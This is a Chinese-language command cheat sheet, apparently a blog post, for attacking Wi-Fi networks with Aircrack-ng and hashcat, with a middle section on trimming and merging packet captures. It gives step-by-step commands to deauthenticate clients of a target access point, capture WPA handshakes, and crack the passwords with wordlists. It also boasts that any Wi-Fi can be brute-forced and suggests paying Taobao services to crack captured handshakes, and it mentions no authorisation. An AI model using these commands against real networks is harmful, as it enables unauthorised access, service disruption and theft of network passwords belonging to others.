一. Aircrack-ng 使用
1. 设置网卡monitor模式
fconfig wlan1 down
iwconfig wlan1 mode monitor
ifconfig wlan1 up
2. 设置网卡监听模式(创建虚接口mon0)
airmon-ng start wlan0 11(11表示信道)
3. 关闭虚接口和设置信道
airomon-ng stop mon0
iwconfig wlan1 channel 10
4. 用wlan1或者虚接口扫描周围的热点和终端
airodump-ng wlan0
airodump-ng wlan0 -w 1.pcap (可抓握手包)
5. 压制
aireplay-ng -0 攻击次数 -a 被攻击AP的MAC wlan0
6. 抓指定ap的握手包
airodump-ng -w wpa1.cap --bssid 被攻击AP的MAC --channel 11(信道数)wlan0(抓包的网卡)
7.破解握手包密码
aircrack-ng ***.cap -w ./passwd.txt(你需要一个强大的字典,并且需要很好的配置,你就可以暴力破解任何wifi了 )
可以抓到握手包后去淘宝跑包哦
二. 数据包处理
1. airdecap-ng 解密包
airdecap-ng -e AP名 -p 密码 ****.cap
2.tcpdump指定时间或者指定大小进行循环抓取报文
tcpdump -i eth3 -s0 -G 60 -Z root -w %Y_%m%d_%H%M_%S.pcap 60秒
tcpdump -i eth3 -s0 -C 1 -Z root -w jiangsuyinhang.pcap 一兆
3.editcap 裁剪包
//" - A < start-time > 和 " - B < end-time > 选项可以过滤出在这个时间段到达的数据包(如,从 2:30 ~ 2:35)。时间的格式为 “ YYYY-MM-DD HH:MM:SS"
editcap -A '2014-12-10 10:11:01' -B '2014-12-10 10:21:01' input.pcap output.pcap
//从 input.pcap 文件中提取100个包(从 401 到 500)并将它们保存到 output.pcap 中
editcap input.pcap output.pcap 401-500
//使用 "-D < dup-window >" (dup-window可以看成是对比的窗口大小,仅与此范围内的包进行对比)选项可以提取出重复包
editcap -D 10 input.pcap output.pcap
//将一个 pcap 文件分割成数据包数目相同的多个文件
editcap -c <packets-per-file> <input-pcap-file> <output-prefix>
//将一个 pcap 文件分割成数据包数目相同的多个文件
editcap -i <seconds-per-file> <input-pcap-file> <output-prefix>
//当合并多个文件时,mergecap 默认将内部的数据包以时间先后来排序
mergecap -w output.pcap input.pcap input2.pcap [input3.pcap . . .]
//下列命令会将 input.pcap 文件的内容写入到 output.pcap, 并且将 input2.pcap 的内容追加在后面
mergecap -a -w output.pcap input.pcap input2.pcap
三. hashcat破解握手包密码
//用aircrack-ng把cap转换成hccap类型数据包
aircrack-ng <input.cap> -J <out.hccap>
//用hashcat破解WPA/PSK密码( -m 2500为破解的模式为WPA/PSK方式)
hashcat -m 2500 testap.hccap pass.txt
网友评论